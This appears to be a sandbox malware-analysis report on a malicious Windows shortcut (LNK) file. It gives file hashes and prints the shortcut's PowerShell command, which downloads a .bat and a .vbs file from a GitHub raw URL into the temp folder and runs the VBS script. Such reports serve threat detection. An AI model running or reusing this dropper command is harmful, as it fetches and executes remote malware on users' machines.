Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
533452be7f667e4ab8e082289a3663ff
Sha1
a80ffb5605126f23618b2a21002d96a76800b0f4
Sha256
c5d72bcef0cb31e87ec071a43ad12468cf9a2841a695016e2240b4585f18cba1
Sha384
6dabfff5c2bac2b3e13b5e2055fb90692e94698469ea66103c906532a81ae806d26ad2baae8000f3a40382da9dbfd616
Sha512
5987b11bf9cb92073f09f275ef216b0086e08a1a14cb21ed8c77072e6f4543d23a33fe5092f44f63eb13b3e8a061e4d555271736c4f03d2ca54053c608190f79
SSDeep
48:8c0m6sTUVNz+X3BIIPTUVNz+phphHrqpDUO:8cNQVNz+X3B4VNz+/fHmt
TLSH
2B319B2026F98314E3F36F7E68F665529022BD02FDA5CF1D0061824D1861A51EC70F76
File Structure
533452be7f667e4ab8e082289a3663ff
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /c powershell -WindowStyle Minimized -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/008webhost/filename/refs/heads/main/file.bat' -OutFile %TMP%\file.bat; Start-Sleep -Seconds 2; Invoke-WebRequest 'https://raw.githubusercontent.com/008webhost/filename/refs/heads/main/file.vbs' -OutFile %TMP%\file.vbs; Start-Process wscript %TMP%\file.vbs"
Deobfuscated PowerShell

Invoke-WebRequest "https://raw.githubusercontent.com/008webhost/filename/refs/heads/main/file.bat" -OutFile "%TMP%\file.bat" Start-Sleep -Seconds 2 Invoke-WebRequest "https://raw.githubusercontent.com/008webhost/filename/refs/heads/main/file.vbs" -OutFile "%TMP%\file.vbs" Start-Process "wscript" "%TMP%\file.vbs"
533452be7f667e4ab8e082289a3663ff (1.63 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙